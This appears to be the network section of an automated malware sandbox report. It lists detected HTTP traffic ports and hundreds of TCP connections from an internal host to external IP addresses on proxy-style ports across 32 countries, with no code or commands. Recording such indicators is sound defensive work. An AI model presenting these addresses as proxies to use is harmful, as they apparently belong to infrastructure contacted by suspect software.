Source: unknown	Network traffic detected: HTTP traffic on port 50736 -> 808
Source: unknown	Network traffic detected: HTTP traffic on port 51032 -> 15303
Source: unknown	Network traffic detected: HTTP traffic on port 51027 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 51015 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 51120 -> 44607
Source: unknown	Network traffic detected: HTTP traffic on port 50249 -> 48962
Source: unknown	Network traffic detected: HTTP traffic on port 50957 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 51022 -> 16379
Source: unknown	Network traffic detected: HTTP traffic on port 51628 -> 26589
Source: unknown	Network traffic detected: HTTP traffic on port 51327 -> 28513
Source: unknown	Network traffic detected: HTTP traffic on port 9080 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 51610 -> 16379
Source: unknown	Network traffic detected: HTTP traffic on port 51189 -> 14398
Source: unknown	Network traffic detected: HTTP traffic on port 51131 -> 999
Source: unknown	Network traffic detected: HTTP traffic on port 51606 -> 7237
Source: unknown	Network traffic detected: HTTP traffic on port 51631 -> 31679
Source: unknown	Network traffic detected: HTTP traffic on port 51667 -> 9764
Source: unknown	Network traffic detected: HTTP traffic on port 51317 -> 2453
Source: unknown	Network traffic detected: HTTP traffic on port 8123 -> 51452
Source: unknown	Network traffic detected: HTTP traffic on port 51648 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 51649 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 51651 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 51650 -> 31654
Source: unknown	Network traffic detected: HTTP traffic on port 51274 -> 38242
Source: unknown	Network traffic detected: HTTP traffic on port 55555 -> 51002
Source: unknown	Network traffic detected: HTTP traffic on port 51612 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 51652 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 51219 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 51603 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 10010 -> 51474
Source: unknown	Network traffic detected: HTTP traffic on port 51502 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 51638 -> 3000
Source: unknown	Network traffic detected: HTTP traffic on port 51703 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 50671 -> 6666
Source: unknown	Network traffic detected: HTTP traffic on port 8123 -> 51473
Source: unknown	Network traffic detected: HTTP traffic on port 51155 -> 6010
Source: unknown	Network traffic detected: HTTP traffic on port 51635 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 51639 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 51292 -> 57447
Source: unknown	Network traffic detected: HTTP traffic on port 51644 -> 25697
Source: unknown	Network traffic detected: HTTP traffic on port 51632 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 51663 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 51259 -> 64935
Source: unknown	Network traffic detected: HTTP traffic on port 9400 -> 51546
Source: unknown	Network traffic detected: HTTP traffic on port 51621 -> 9091
Source: unknown	Network traffic detected: HTTP traffic on port 51655 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 51660 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 51666 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 51231 -> 9500
Source: unknown	Network traffic detected: HTTP traffic on port 51657 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 51659 -> 61818
Source: unknown	Network traffic detected: HTTP traffic on port 51664 -> 61725
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 51542
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 6821
Source: unknown	Network traffic detected: HTTP traffic on port 51750 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 51645 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 51658 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 51205 -> 9090
Source: unknown	Network traffic detected: HTTP traffic on port 51682 -> 18080
Source: unknown	Network traffic detected: HTTP traffic on port 51763 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 51641 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 1082 -> 51545
Source: unknown	Network traffic detected: HTTP traffic on port 5811 -> 51567
Source: unknown	Network traffic detected: HTTP traffic on port 51673 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 6087 -> 51550
Source: unknown	Network traffic detected: HTTP traffic on port 51808 -> 11096
Source: unknown	Network traffic detected: HTTP traffic on port 51700 -> 3389
Source: unknown	Network traffic detected: HTTP traffic on port 51691 -> 38832
Source: unknown	Network traffic detected: HTTP traffic on port 51706 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 51716 -> 8989
Source: unknown	Network traffic detected: HTTP traffic on port 51704 -> 8002
Source: unknown	Network traffic detected: HTTP traffic on port 51306 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 51734 -> 16993
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 51226
Source: unknown	Network traffic detected: HTTP traffic on port 51365 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 7890 -> 51574
Source: unknown	Network traffic detected: HTTP traffic on port 51777 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 51173 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 51342 -> 16379
Source: unknown	Network traffic detected: HTTP traffic on port 51694 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 51812 -> 57745
Source: unknown	Network traffic detected: HTTP traffic on port 51834 -> 55425
Source: unknown	Network traffic detected: HTTP traffic on port 51871 -> 4153
Source: unknown	Network traffic detected: HTTP traffic on port 50465 -> 12446
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 50343
Source: unknown	Network traffic detected: HTTP traffic on port 51821 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 51817 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 50131
Source: unknown	Network traffic detected: HTTP traffic on port 51893 -> 9080
Source: unknown	Network traffic detected: HTTP traffic on port 51833 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 51835 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 51756 -> 10471
Source: unknown	Network traffic detected: HTTP traffic on port 51840 -> 49547
Source: unknown	Network traffic detected: HTTP traffic on port 51753 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 51337 -> 1981
Source: unknown	Network traffic detected: HTTP traffic on port 51887 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 51828 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 51815 -> 16379
Source: unknown	Network traffic detected: HTTP traffic on port 51772 -> 9090
Source: unknown	Network traffic detected: HTTP traffic on port 51961 -> 8585
Source: unknown	Network traffic detected: HTTP traffic on port 51851 -> 8193

Source: unknown

Network traffic detected: IP country count 32

Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 197.234.13.97:4145
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 154.73.29.1:8080
Source: global traffic	TCP traffic: 192.168.2.5:49713 -> 162.241.158.204:52980
Source: global traffic	TCP traffic: 192.168.2.5:49714 -> 51.222.241.8:36219
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 177.38.5.42:4153
Source: global traffic	TCP traffic: 192.168.2.5:49716 -> 206.189.145.23:49614
Source: global traffic	TCP traffic: 192.168.2.5:49717 -> 212.102.47.83:8219
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 101.255.165.130:1111
Source: global traffic	TCP traffic: 192.168.2.5:49719 -> 211.174.114.225:4153
Source: global traffic	TCP traffic: 192.168.2.5:49721 -> 1.20.184.75:4153
Source: global traffic	TCP traffic: 192.168.2.5:49722 -> 119.3.215.41:8888
Source: global traffic	TCP traffic: 192.168.2.5:49723 -> 212.237.218.68:3128
Source: global traffic	TCP traffic: 192.168.2.5:49708 -> 41.60.232.18:5678
Source: global traffic	TCP traffic: 192.168.2.5:49709 -> 197.234.13.27:4145
Source: global traffic	TCP traffic: 192.168.2.5:49724 -> 190.97.238.94:999
Source: global traffic	TCP traffic: 192.168.2.5:49725 -> 27.123.1.35:4153
Source: global traffic	TCP traffic: 192.168.2.5:49727 -> 187.216.144.170:5678
Source: global traffic	TCP traffic: 192.168.2.5:49728 -> 84.36.23.44:8080
Source: global traffic	TCP traffic: 192.168.2.5:49730 -> 45.65.138.48:999
Source: global traffic	TCP traffic: 192.168.2.5:49731 -> 41.33.203.231:1981
Source: global traffic	TCP traffic: 192.168.2.5:49732 -> 86.206.214.11:1080
Source: global traffic	TCP traffic: 192.168.2.5:49733 -> 186.103.130.94:8080
Source: global traffic	TCP traffic: 192.168.2.5:49734 -> 103.149.194.40:32650
Source: global traffic	TCP traffic: 192.168.2.5:49735 -> 94.131.63.120:58378
Source: global traffic	TCP traffic: 192.168.2.5:49736 -> 186.96.95.205:999
Source: global traffic	TCP traffic: 192.168.2.5:49737 -> 150.230.96.150:19291
Source: global traffic	TCP traffic: 192.168.2.5:49738 -> 209.14.112.3:1080
Source: global traffic	TCP traffic: 192.168.2.5:49739 -> 177.131.29.213:4153
Source: global traffic	TCP traffic: 192.168.2.5:49740 -> 131.100.48.233:999
Source: global traffic	TCP traffic: 192.168.2.5:49742 -> 203.96.177.211:33382
Source: global traffic	TCP traffic: 192.168.2.5:49744 -> 223.113.89.138:1080
Source: global traffic	TCP traffic: 192.168.2.5:49747 -> 103.5.127.213:50806
Source: global traffic	TCP traffic: 192.168.2.5:49748 -> 165.227.196.37:63637
Source: global traffic	TCP traffic: 192.168.2.5:49749 -> 103.178.194.190:1111
Source: global traffic	TCP traffic: 192.168.2.5:49750 -> 61.129.2.212:8080
Source: global traffic	TCP traffic: 192.168.2.5:49751 -> 47.243.177.21:8088
Source: global traffic	TCP traffic: 192.168.2.5:49752 -> 41.65.236.37:1981
Source: global traffic	TCP traffic: 192.168.2.5:49755 -> 51.15.230.100:16379
Source: global traffic	TCP traffic: 192.168.2.5:49756 -> 188.132.222.44:8080
Source: global traffic	TCP traffic: 192.168.2.5:49757 -> 45.230.39.105:999
Source: global traffic	TCP traffic: 192.168.2.5:49758 -> 162.214.170.144:37592
Source: global traffic	TCP traffic: 192.168.2.5:49759 -> 207.180.198.241:37443
Source: global traffic	TCP traffic: 192.168.2.5:49760 -> 38.7.4.89:999
Source: global traffic	TCP traffic: 192.168.2.5:49762 -> 170.233.117.249:4153
Source: global traffic	TCP traffic: 192.168.2.5:49763 -> 178.79.141.38:45263
Source: global traffic	TCP traffic: 192.168.2.5:49764 -> 72.10.160.90:25257
Source: global traffic	TCP traffic: 192.168.2.5:49765 -> 202.154.178.243:5678
Source: global traffic	TCP traffic: 192.168.2.5:49766 -> 107.180.88.173:35774
Source: global traffic	TCP traffic: 192.168.2.5:49769 -> 196.20.125.149:8083
Source: global traffic	TCP traffic: 192.168.2.5:49768 -> 212.83.137.142:44974
Source: global traffic	TCP traffic: 192.168.2.5:49771 -> 103.130.218.135:4002
Source: global traffic	TCP traffic: 192.168.2.5:49772 -> 49.48.126.12:8080
Source: global traffic	TCP traffic: 192.168.2.5:49773 -> 47.176.213.210:39593
Source: global traffic	TCP traffic: 192.168.2.5:49774 -> 105.214.36.255:5678
Source: global traffic	TCP traffic: 192.168.2.5:49776 -> 94.23.220.136:43751
Source: global traffic	TCP traffic: 192.168.2.5:49777 -> 204.199.120.28:999
Source: global traffic	TCP traffic: 192.168.2.5:49778 -> 161.97.163.52:9045
Source: global traffic	TCP traffic: 192.168.2.5:49779 -> 184.170.248.5:4145
Source: global traffic	TCP traffic: 192.168.2.5:49780 -> 200.54.22.74:8080
Source: global traffic	TCP traffic: 192.168.2.5:49781 -> 164.68.107.253:48172
Source: global traffic	TCP traffic: 192.168.2.5:49783 -> 184.170.245.148:4145
Source: global traffic	TCP traffic: 192.168.2.5:49784 -> 91.134.140.160:57320
Source: global traffic	TCP traffic: 192.168.2.5:49785 -> 91.222.198.125:5678
Source: global traffic	TCP traffic: 192.168.2.5:49789 -> 42.61.48.219:8000
Source: global traffic	TCP traffic: 192.168.2.5:49790 -> 103.35.189.217:1080
Source: global traffic	TCP traffic: 192.168.2.5:49791 -> 50.63.12.101:2953
Source: global traffic	TCP traffic: 192.168.2.5:49793 -> 24.249.199.12:4145
Source: global traffic	TCP traffic: 192.168.2.5:49794 -> 51.89.173.40:23854
Source: global traffic	TCP traffic: 192.168.2.5:49795 -> 74.207.241.80:8080
Source: global traffic	TCP traffic: 192.168.2.5:49796 -> 103.194.88.107:32650
Source: global traffic	TCP traffic: 192.168.2.5:49797 -> 119.199.225.148:4145
Source: global traffic	TCP traffic: 192.168.2.5:49798 -> 67.43.236.20:29621
Source: global traffic	TCP traffic: 192.168.2.5:49799 -> 78.128.81.220:31623
Source: global traffic	TCP traffic: 192.168.2.5:49800 -> 186.3.155.25:8080
Source: global traffic	TCP traffic: 192.168.2.5:49802 -> 38.156.73.54:8080
Source: global traffic	TCP traffic: 192.168.2.5:49803 -> 187.193.48.9:8080
Source: global traffic	TCP traffic: 192.168.2.5:49804 -> 43.131.248.165:15673
Source: global traffic	TCP traffic: 192.168.2.5:49805 -> 67.213.210.168:46716
Source: global traffic	TCP traffic: 192.168.2.5:49806 -> 174.77.111.198:49547
Source: global traffic	TCP traffic: 192.168.2.5:49807 -> 190.6.56.133:8080
Source: global traffic	TCP traffic: 192.168.2.5:49808 -> 144.48.111.7:8674
Source: global traffic	TCP traffic: 192.168.2.5:49809 -> 110.78.186.153:4145
Source: global traffic	TCP traffic: 192.168.2.5:49810 -> 209.222.97.30:19481
Source: global traffic	TCP traffic: 192.168.2.5:49811 -> 163.172.144.132:16379
Source: global traffic	TCP traffic: 192.168.2.5:49812 -> 85.214.244.174:3128
Source: global traffic	TCP traffic: 192.168.2.5:49813 -> 194.4.50.127:12334
Source: global traffic	TCP traffic: 192.168.2.5:49814 -> 148.72.206.84:2536
Source: global traffic	TCP traffic: 192.168.2.5:49815 -> 207.180.234.220:42692
Source: global traffic	TCP traffic: 192.168.2.5:49816 -> 45.128.133.1:1080
Source: global traffic	TCP traffic: 192.168.2.5:49817 -> 202.154.18.139:8080
Source: global traffic	TCP traffic: 192.168.2.5:49818 -> 103.87.169.167:32650
Source: global traffic	TCP traffic: 192.168.2.5:49819 -> 45.11.95.165:5044
Source: global traffic	TCP traffic: 192.168.2.5:49820 -> 43.155.130.182:15673
Source: global traffic	TCP traffic: 192.168.2.5:49821 -> 177.93.76.26:4153
Source: global traffic	TCP traffic: 192.168.2.5:49822 -> 120.76.42.209:8888
Source: global traffic	TCP traffic: 192.168.2.5:49823 -> 88.255.102.114:1082
Source: global traffic	TCP traffic: 192.168.2.5:49826 -> 72.10.164.178:20553
Source: global traffic	TCP traffic: 192.168.2.5:49828 -> 181.129.183.19:53281
Source: global traffic	TCP traffic: 192.168.2.5:49829 -> 191.240.153.165:8080
Source: global traffic	TCP traffic: 192.168.2.5:49830 -> 185.108.141.114:8080
Source: global traffic	TCP traffic: 192.168.2.5:49831 -> 164.92.237.188:63722
Source: global traffic	TCP traffic: 192.168.2.5:49832 -> 146.59.70.29:32953
Source: global traffic	TCP traffic: 192.168.2.5:49833 -> 36.91.98.115:8181
Source: global traffic	TCP traffic: 192.168.2.5:49834 -> 117.160.250.134:8899
Source: global traffic	TCP traffic: 192.168.2.5:49835 -> 116.242.89.230:3128
Source: global traffic	TCP traffic: 192.168.2.5:49836 -> 92.204.135.37:32524
Source: global traffic	TCP traffic: 192.168.2.5:49837 -> 121.101.135.46:8089
Source: global traffic	TCP traffic: 192.168.2.5:49839 -> 176.8.230.197:8187
Source: global traffic	TCP traffic: 192.168.2.5:49842 -> 88.80.187.42:3128
Source: global traffic	TCP traffic: 192.168.2.5:49843 -> 47.251.34.170:1080
Source: global traffic	TCP traffic: 192.168.2.5:49844 -> 201.71.3.60:999
Source: global traffic	TCP traffic: 192.168.2.5:49845 -> 159.65.39.234:7732
Source: global traffic	TCP traffic: 192.168.2.5:49846 -> 201.20.94.93:8080
Source: global traffic	TCP traffic: 192.168.2.5:49848 -> 67.43.227.226:12673
Source: global traffic	TCP traffic: 192.168.2.5:49849 -> 195.178.33.86:8080
Source: global traffic	TCP traffic: 192.168.2.5:49850 -> 164.92.86.113:62987
Source: global traffic	TCP traffic: 192.168.2.5:49851 -> 142.54.239.1:4145
Source: global traffic	TCP traffic: 192.168.2.5:49852 -> 111.38.73.92:9002
Source: global traffic	TCP traffic: 192.168.2.5:49854 -> 75.119.145.154:7505
Source: global traffic	TCP traffic: 192.168.2.5:49856 -> 8.213.128.6:3128
Source: global traffic	TCP traffic: 192.168.2.5:49858 -> 178.141.249.246:8081
Source: global traffic	TCP traffic: 192.168.2.5:49859 -> 161.97.147.193:43131
Source: global traffic	TCP traffic: 192.168.2.5:49860 -> 107.180.103.214:61634
Source: global traffic	TCP traffic: 192.168.2.5:49861 -> 12.89.124.138:4145
Source: global traffic	TCP traffic: 192.168.2.5:49862 -> 165.227.104.122:58839
Source: global traffic	TCP traffic: 192.168.2.5:49863 -> 212.112.125.44:45555
Source: global traffic	TCP traffic: 192.168.2.5:49864 -> 103.114.53.2:8080
Source: global traffic	TCP traffic: 192.168.2.5:49865 -> 190.61.48.24:999
Source: global traffic	TCP traffic: 192.168.2.5:49866 -> 94.26.241.120:8080
Source: global traffic	TCP traffic: 192.168.2.5:49867 -> 41.86.46.112:8080
Source: global traffic	TCP traffic: 192.168.2.5:49868 -> 155.185.15.56:3128
Source: global traffic	TCP traffic: 192.168.2.5:49869 -> 2.229.249.153:4145
Source: global traffic	TCP traffic: 192.168.2.5:49870 -> 36.88.140.235:8080
Source: global traffic	TCP traffic: 192.168.2.5:49871 -> 186.215.87.194:6033
Source: global traffic	TCP traffic: 192.168.2.5:49872 -> 185.158.114.14:25697
Source: global traffic	TCP traffic: 192.168.2.5:49873 -> 132.148.245.112:38117
Source: global traffic	TCP traffic: 192.168.2.5:49874 -> 198.12.255.193:6821
Source: global traffic	TCP traffic: 192.168.2.5:49876 -> 195.138.73.54:44017
Source: global traffic	TCP traffic: 192.168.2.5:49878 -> 211.54.26.187:3128
Source: global traffic	TCP traffic: 192.168.2.5:49879 -> 154.205.152.96:9080
Source: global traffic	TCP traffic: 192.168.2.5:49880 -> 162.241.137.197:40604
Source: global traffic	TCP traffic: 192.168.2.5:49882 -> 62.103.66.18:3128
Source: global traffic	TCP traffic: 192.168.2.5:49883 -> 51.68.164.77:54504
Source: global traffic	TCP traffic: 192.168.2.5:49884 -> 37.120.162.180:42370
Source: global traffic	TCP traffic: 192.168.2.5:49886 -> 190.2.115.33:4153
Source: global traffic	TCP traffic: 192.168.2.5:49887 -> 103.171.165.93:8080
Source: global traffic	TCP traffic: 192.168.2.5:49889 -> 41.223.108.13:1080
Source: global traffic	TCP traffic: 192.168.2.5:49890 -> 46.253.143.144:3128
Source: global traffic	TCP traffic: 192.168.2.5:49892 -> 178.49.14.57:3128
Source: global traffic	TCP traffic: 192.168.2.5:49893 -> 168.138.231.177:3128
Source: global traffic	TCP traffic: 192.168.2.5:49894 -> 103.19.10.245:4153
Source: global traffic	TCP traffic: 192.168.2.5:49895 -> 41.70.12.54:5678
Source: global traffic	TCP traffic: 192.168.2.5:49896 -> 103.190.171.137:8080
Source: global traffic	TCP traffic: 192.168.2.5:49897 -> 62.171.169.37:58402
Source: global traffic	TCP traffic: 192.168.2.5:49900 -> 72.195.114.169:4145
Source: global traffic	TCP traffic: 192.168.2.5:49901 -> 163.181.123.54:8080
Source: global traffic	TCP traffic: 192.168.2.5:49902 -> 36.37.180.40:1080
Source: global traffic	TCP traffic: 192.168.2.5:49903 -> 202.137.141.212:5678
Source: global traffic	TCP traffic: 192.168.2.5:49904 -> 140.227.204.70:3128
Source: global traffic	TCP traffic: 192.168.2.5:49905 -> 88.202.230.103:39647
Source: global traffic	TCP traffic: 192.168.2.5:49906 -> 162.214.227.68:60433
Source: global traffic	TCP traffic: 192.168.2.5:49907 -> 103.122.66.140:1111
Source: global traffic	TCP traffic: 192.168.2.5:49908 -> 190.97.238.83:999
Source: global traffic	TCP traffic: 192.168.2.5:49909 -> 189.240.60.171:9090
Source: global traffic	TCP traffic: 192.168.2.5:49910 -> 104.37.135.145:4145
Source: global traffic	TCP traffic: 192.168.2.5:49911 -> 103.56.206.65:4995
Source: global traffic	TCP traffic: 192.168.2.5:49912 -> 195.177.217.131:52858
Source: global traffic	TCP traffic: 192.168.2.5:49913 -> 45.138.87.238:1080
Source: global traffic	TCP traffic: 192.168.2.5:49914 -> 103.111.160.41:5678
Source: global traffic	TCP traffic: 192.168.2.5:49915 -> 188.164.196.31:53276
Source: global traffic	TCP traffic: 192.168.2.5:49917 -> 146.59.18.246:40975
Source: global traffic	TCP traffic: 192.168.2.5:49918 -> 203.202.253.108:5020
Source: global traffic	TCP traffic: 192.168.2.5:49919 -> 200.108.197.2:8080
Source: global traffic	TCP traffic: 192.168.2.5:49920 -> 90.84.229.56:3629
Source: global traffic	TCP traffic: 192.168.2.5:49921 -> 174.77.111.196:4145
Source: global traffic	TCP traffic: 192.168.2.5:49923 -> 185.89.156.130:5678
Source: global traffic	TCP traffic: 192.168.2.5:49924 -> 142.4.7.20:39782
Source: global traffic	TCP traffic: 192.168.2.5:49925 -> 119.8.111.196:1080
Source: global traffic	TCP traffic: 192.168.2.5:49927 -> 186.46.34.20:999
Source: global traffic	TCP traffic: 192.168.2.5:49929 -> 179.43.10.0:8085
Source: global traffic	TCP traffic: 192.168.2.5:49931 -> 154.236.179.235:1981
Source: global traffic	TCP traffic: 192.168.2.5:49932 -> 38.10.179.195:999
Source: global traffic	TCP traffic: 192.168.2.5:49933 -> 184.178.172.5:15303
Source: global traffic	TCP traffic: 192.168.2.5:49934 -> 45.233.170.74:999
Source: global traffic	TCP traffic: 192.168.2.5:49937 -> 188.132.222.23:8080
Source: global traffic	TCP traffic: 192.168.2.5:49938 -> 114.108.177.104:60984
Source: global traffic	TCP traffic: 192.168.2.5:49939 -> 111.90.150.109:1080
Source: global traffic	TCP traffic: 192.168.2.5:49940 -> 51.15.133.214:16379
Source: global traffic	TCP traffic: 192.168.2.5:49941 -> 116.68.162.82:8080
Source: global traffic	TCP traffic: 192.168.2.5:49943 -> 188.165.237.26:52982
Source: global traffic	TCP traffic: 192.168.2.5:49944 -> 103.229.83.106:6789
Source: global traffic	TCP traffic: 192.168.2.5:49945 -> 177.93.44.53:999
Source: global traffic	TCP traffic: 192.168.2.5:49948 -> 197.234.13.52:36902
Source: global traffic	TCP traffic: 192.168.2.5:49949 -> 171.250.222.13:1080
Source: global traffic	TCP traffic: 192.168.2.5:49951 -> 62.171.131.101:37447
Source: global traffic	TCP traffic: 192.168.2.5:49952 -> 103.159.194.241:8080
Source: global traffic	TCP traffic: 192.168.2.5:49953 -> 27.123.3.141:4145
Source: global traffic	TCP traffic: 192.168.2.5:49954 -> 18.134.236.231:3128
Source: global traffic	TCP traffic: 192.168.2.5:49955 -> 104.236.10.83:33447
Source: global traffic	TCP traffic: 192.168.2.5:49957 -> 95.164.89.123:8888
Source: global traffic	TCP traffic: 192.168.2.5:49958 -> 203.188.245.98:52837
Source: global traffic	TCP traffic: 192.168.2.5:49959 -> 50.62.134.139:36916
Source: global traffic	TCP traffic: 192.168.2.5:49960 -> 92.205.110.118:7895
Source: global traffic	TCP traffic: 192.168.2.5:49961 -> 45.4.202.73:999
Source: global traffic	TCP traffic: 192.168.2.5:49962 -> 201.184.159.28:5678
Source: global traffic	TCP traffic: 192.168.2.5:49963 -> 51.158.77.220:16379
Source: global traffic	TCP traffic: 192.168.2.5:49964 -> 162.214.121.11:3549
Source: global traffic	TCP traffic: 192.168.2.5:49965 -> 195.90.216.75:1080
Source: global traffic	TCP traffic: 192.168.2.5:49966 -> 49.156.34.190:24492
Source: global traffic	TCP traffic: 192.168.2.5:49967 -> 14.207.167.114:8080
Source: global traffic	TCP traffic: 192.168.2.5:49968 -> 46.175.4.76:39574
Source: global traffic	TCP traffic: 192.168.2.5:49969 -> 141.98.248.19:3128
Source: global traffic	TCP traffic: 192.168.2.5:49972 -> 20.219.177.85:3129
Source: global traffic	TCP traffic: 192.168.2.5:49974 -> 103.70.159.142:5678
Source: global traffic	TCP traffic: 192.168.2.5:49976 -> 101.133.162.23:8899
Source: global traffic	TCP traffic: 192.168.2.5:49977 -> 194.233.78.142:34471
Source: global traffic	TCP traffic: 192.168.2.5:49978 -> 34.95.243.122:8081
Source: global traffic	TCP traffic: 192.168.2.5:49979 -> 198.105.111.15:6693
Source: global traffic	TCP traffic: 192.168.2.5:49980 -> 46.17.63.166:9091
Source: global traffic	TCP traffic: 192.168.2.5:49981 -> 45.56.83.46:8047
Source: global traffic	TCP traffic: 192.168.2.5:49982 -> 199.85.209.166:29657
Source: global traffic	TCP traffic: 192.168.2.5:49983 -> 103.124.137.150:20
Source: global traffic	TCP traffic: 192.168.2.5:49984 -> 93.158.202.194:50673
Source: global traffic	TCP traffic: 192.168.2.5:49986 -> 45.70.204.233:4145
Source: global traffic	TCP traffic: 192.168.2.5:49987 -> 103.49.114.195:8080
Source: global traffic	TCP traffic: 192.168.2.5:49988 -> 198.89.91.42:5678
Source: global traffic	TCP traffic: 192.168.2.5:49989 -> 117.160.250.163:82
Source: global traffic	TCP traffic: 192.168.2.5:49990 -> 92.205.61.38:48664
Source: global traffic	TCP traffic: 192.168.2.5:49991 -> 185.132.179.72:3128
Source: global traffic	TCP traffic: 192.168.2.5:49992 -> 117.30.118.200:8118
Source: global traffic	TCP traffic: 192.168.2.5:49993 -> 43.132.184.228:8181
Source: global traffic	TCP traffic: 192.168.2.5:49994 -> 36.134.91.82:8888
Source: global traffic	TCP traffic: 192.168.2.5:49995 -> 109.70.189.30:38880
Source: global traffic	TCP traffic: 192.168.2.5:49996 -> 35.79.120.242:3128
Source: global traffic	TCP traffic: 192.168.2.5:49997 -> 165.16.60.231:8080
Source: global traffic	TCP traffic: 192.168.2.5:49998 -> 36.93.138.74:5678
Source: global traffic	TCP traffic: 192.168.2.5:49999 -> 185.8.67.9:8080
Source: global traffic	TCP traffic: 192.168.2.5:50000 -> 72.10.160.170:1205
Source: global traffic	TCP traffic: 192.168.2.5:50001 -> 103.147.250.149:84
Source: global traffic	TCP traffic: 192.168.2.5:50002 -> 197.232.47.122:8080
Source: global traffic	TCP traffic: 192.168.2.5:50003 -> 94.131.106.196:1080
Source: global traffic	TCP traffic: 192.168.2.5:50004 -> 217.172.122.14:8080
Source: global traffic	TCP traffic: 192.168.2.5:50005 -> 103.88.57.203:32650
Source: global traffic	TCP traffic: 192.168.2.5:50006 -> 160.0.203.99:1080
Source: global traffic	TCP traffic: 192.168.2.5:50007 -> 162.240.208.98:43704
Source: global traffic	TCP traffic: 192.168.2.5:50008 -> 64.225.48.234:3128
Source: global traffic	TCP traffic: 192.168.2.5:50009 -> 159.223.71.71:51616
Source: global traffic	TCP traffic: 192.168.2.5:50010 -> 201.71.2.177:999
Source: global traffic	TCP traffic: 192.168.2.5:50011 -> 110.164.175.110:8080
Source: global traffic	TCP traffic: 192.168.2.5:50014 -> 176.99.2.43:1081
Source: global traffic	TCP traffic: 192.168.2.5:50015 -> 193.239.58.92:8081
Source: global traffic	TCP traffic: 192.168.2.5:50017 -> 51.15.132.215:16379
Source: global traffic	TCP traffic: 192.168.2.5:50020 -> 185.198.58.47:22698
Source: global traffic	TCP traffic: 192.168.2.5:50025 -> 45.117.179.179:6522
Source: global traffic	TCP traffic: 192.168.2.5:50026 -> 154.236.189.13:1976
Source: global traffic	TCP traffic: 192.168.2.5:50028 -> 43.255.113.232:8081
Source: global traffic	TCP traffic: 192.168.2.5:50029 -> 190.61.32.168:6969
Source: global traffic	TCP traffic: 192.168.2.5:50030 -> 165.22.209.96:25150
Source: global traffic	TCP traffic: 192.168.2.5:50031 -> 92.204.134.38:7785
Source: global traffic	TCP traffic: 192.168.2.5:50033 -> 120.194.4.157:5443
Source: global traffic	TCP traffic: 192.168.2.5:50036 -> 203.112.223.126:8080
Source: global traffic	TCP traffic: 192.168.2.5:50037 -> 104.236.0.129:22167
Source: global traffic	TCP traffic: 192.168.2.5:50038 -> 45.164.174.26:999
Source: global traffic	TCP traffic: 192.168.2.5:50039 -> 155.50.215.37:3128
Source: global traffic	TCP traffic: 192.168.2.5:50041 -> 89.249.65.191:3128
Source: global traffic	TCP traffic: 192.168.2.5:50042 -> 51.158.124.167:16379
Source: global traffic	TCP traffic: 192.168.2.5:50043 -> 162.240.72.139:20614
Source: global traffic	TCP traffic: 192.168.2.5:50045 -> 35.237.210.215:3128
Source: global traffic	TCP traffic: 192.168.2.5:50047 -> 103.105.228.66:8080
Source: global traffic	TCP traffic: 192.168.2.5:50048 -> 198.23.143.24:6969
Source: global traffic	TCP traffic: 192.168.2.5:50049 -> 185.82.238.203:5678
Source: global traffic	TCP traffic: 192.168.2.5:50050 -> 103.172.42.121:8080
Source: global traffic	TCP traffic: 192.168.2.5:50051 -> 103.76.172.230:4153
Source: global traffic	TCP traffic: 192.168.2.5:50052 -> 162.241.66.135:34455
Source: global traffic	TCP traffic: 192.168.2.5:50054 -> 101.51.121.29:4153
Source: global traffic	TCP traffic: 192.168.2.5:50057 -> 185.139.56.133:4145
Source: global traffic	TCP traffic: 192.168.2.5:50059 -> 159.224.243.185:37793
Source: global traffic	TCP traffic: 192.168.2.5:50060 -> 171.22.108.188:3128
Source: global traffic	TCP traffic: 192.168.2.5:50061 -> 181.78.94.170:999
Source: global traffic	TCP traffic: 192.168.2.5:50062 -> 13.234.24.116:3128
Source: global traffic	TCP traffic: 192.168.2.5:50066 -> 36.64.52.226:8080
Source: global traffic	TCP traffic: 192.168.2.5:50068 -> 20.169.221.14:3128
